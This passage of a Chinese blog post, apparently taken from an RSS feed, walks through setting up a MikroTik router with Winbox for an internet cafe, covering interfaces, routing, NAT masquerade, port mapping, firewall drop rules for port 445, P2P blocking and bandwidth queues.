<P style="TEXT-INDENT: 2em">5下载左上方的mikrotik winbox consle,输入地址，用户名，密码登入</P>
<P style="TEXT-INDENT: 2em">6先在interface 中 把两个接口改名 wan 和lan 便于辨认，原来的wan 口是灰色的，打上勾启动起来。</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">7选IP ---address 点+号添加一个Ip,子网掩码用10进制，比如255.255.255.252就是30&nbsp;&nbsp;（30个1），接口选wan</P>
<P style="TEXT-INDENT: 2em">8 选IP ----Router&nbsp;&nbsp;点+号添加个路由，在gateway 中输外网网关</P>
<P style="TEXT-INDENT: 2em">9选IP ---Firewall,在source NAT 中加入内网网段，在general 的src address 中输内网网段，多个网段可加多个</P>
<P style="TEXT-INDENT: 2em">在Action 中 选&nbsp;&nbsp;&nbsp; masquerade ,意思是IP伪装。</P>
<P style="TEXT-INDENT: 2em">到这已经可以正常上网了。</P>
<P style="TEXT-INDENT: 2em">10端口映射在IP---firewall---destinationNAT general 的 dst address 输外网IP 掩码32 端口 协议 。</P>
<P style="TEXT-INDENT: 2em">在Action 中输内网ip 端口，&nbsp;&nbsp;&nbsp; action 选 nat&nbsp;&nbsp;&nbsp;</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">11防火墙的设置</P>
<P style="TEXT-INDENT: 2em">在 ip –firewall ---Filter rule 中，有intup （入口） forward (转发) output (出口),网吧一般设置input 和forward就可以了</P>
<P style="TEXT-INDENT: 2em">比如封掉445端口，协议tcp 和udp 都要做，input 和forward 都要做，action 选drop 就是丢弃</P>
<P style="TEXT-INDENT: 2em"></P>
<P style="TEXT-INDENT: 2em">限制 bt 下载，在advanced –p2p 中选 bit-torrent ,里面还有其他的p2p软件，看情况设，梦幻西游用的是里面的kazaa</P>
<P style="TEXT-INDENT: 2em">限制下载速度在queues –simple queue ,比如限制ip 为192.168.0.5的机器的下载速度为128k-256k 上传为56k-128k</P>
<P style="TEXT-INDENT: 2em">最后别忘了设置密码：</P>
<P style="TEXT-INDENT: 2em"></P></TD></TR></TBODY></TABLE></P></div>]]></description>
	    <author><![CDATA[ し楠し]]></author>
	    <comments>http://wnnqt.blog.163.com/blog/static/4819109420082962016383</comments>
    <slash:comments>0</slash:comments>
    <guid isPermaLink="true">http://wnnqt.blog.163.com/blog/static/4